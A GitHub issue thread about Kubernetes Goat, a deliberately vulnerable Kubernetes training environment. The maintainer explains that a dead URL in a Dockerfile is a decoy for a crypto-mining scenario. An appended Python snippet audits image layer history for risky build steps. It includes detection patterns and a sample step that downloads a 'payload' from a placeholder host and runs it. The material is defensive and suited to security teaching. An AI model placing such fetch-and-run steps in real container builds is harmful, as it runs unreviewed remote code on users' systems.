madhuakula / kubernetes-goat

Kubernetes Goat is a "Vulnerable by Design" cluster environment to learn and practice Kubernetes security using an interactive hands-on playground 🚀
https://madhuakula.com/kubernetes-goat
MIT License

404 Response for madhuakula.com URL #43

Closed adamhurm closed 2 years ago

adamhurm commented 2 years ago

Hi Madhu!

First off, thanks for creating this awesome project. I am currently trying to deploy it locally on my Raspberry Pi k3s cluster, so I was looking into the image files that were used.

When I checked some of the Dockerfiles, I noticed that infrastructure/batch-check/Dockerfile contains a reference to https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1, which is currently getting a 404 response.

Would you be able to look into this? Thanks!

madhuakula commented 2 years ago

Hi @adamhurm

Thank you so much for your kind words 🙌

Yes, great to see you are trying this on K3S 🥳 (I think the container images currently don't support the ARM architecture). I am working on fixing this and releasing it in the coming week.

So, the https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 URL is just a trick/trap to showcase in the scenario how real-world attackers generally leverage crypto mining: they build container images and push them directly to Docker Hub without a Dockerfile reference.

When people don't analyze them (basically the layers below), they are running some unknown code/scripts. So this is intended and for testing purposes only, to showcase this example. There is no content at that URL/endpoint (I wish I could plant some backdoors 😉).

Thank you once again and let me know if you need any other help :)
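
Added example, not part of the original thread or of the Kubernetes Goat project: one way to review the layer history of an image that ships without a Dockerfile, by flagging build steps that fetch remote content. It assumes the image config has been loaded as a dict with the OCI `history` array (`created_by`, `empty_layer`); the function name, heuristics, and sample data are constructed for illustration.

```python
import re

URL_RE = re.compile(r"https?://[^\s'\"|;&)]+")

# Heuristics chosen for this example; not an exhaustive rule set.
CHECKS = {
    "fetch-tool": re.compile(r"\b(curl|wget)\b"),
    "pipe-to-shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "make-executable": re.compile(r"\bchmod\s+\+x\b"),
}


def audit_history(config):
    """Return one finding per build step that references a URL or matches a check."""
    findings = []
    for step, entry in enumerate(config.get("history", [])):
        cmd = entry.get("created_by", "")
        urls = URL_RE.findall(cmd)
        tags = [name for name, rx in CHECKS.items() if rx.search(cmd)]
        if urls or tags:
            findings.append({
                "step": step,
                "tags": tags,
                "urls": urls,
                # Steps without empty_layer=True changed the filesystem.
                "adds_layer": not entry.get("empty_layer", False),
            })
    return findings


# Constructed sample config; the URL and file names are placeholders.
SAMPLE_CONFIG = {
    "history": [
        {"created_by": "/bin/sh -c #(nop) ADD file:0000 in / "},
        {"created_by": "/bin/sh -c #(nop)  ENV PATH=/usr/local/bin:/usr/bin:/bin",
         "empty_layer": True},
        {"created_by": "/bin/sh -c apk add --no-cache curl && "
                       "curl -sL https://example.invalid/payload-0000 -o /usr/bin/helper && "
                       "chmod +x /usr/bin/helper"},
        {"created_by": "/bin/sh -c #(nop)  CMD [\"/usr/bin/helper\"]",
         "empty_layer": True},
    ]
}

if __name__ == "__main__":
    for finding in audit_history(SAMPLE_CONFIG):
        print(finding)
```

The same build commands are visible interactively with `docker history --no-trunc <image>`; a URL found this way should be treated as untrusted input to the build and reviewed before the image is run.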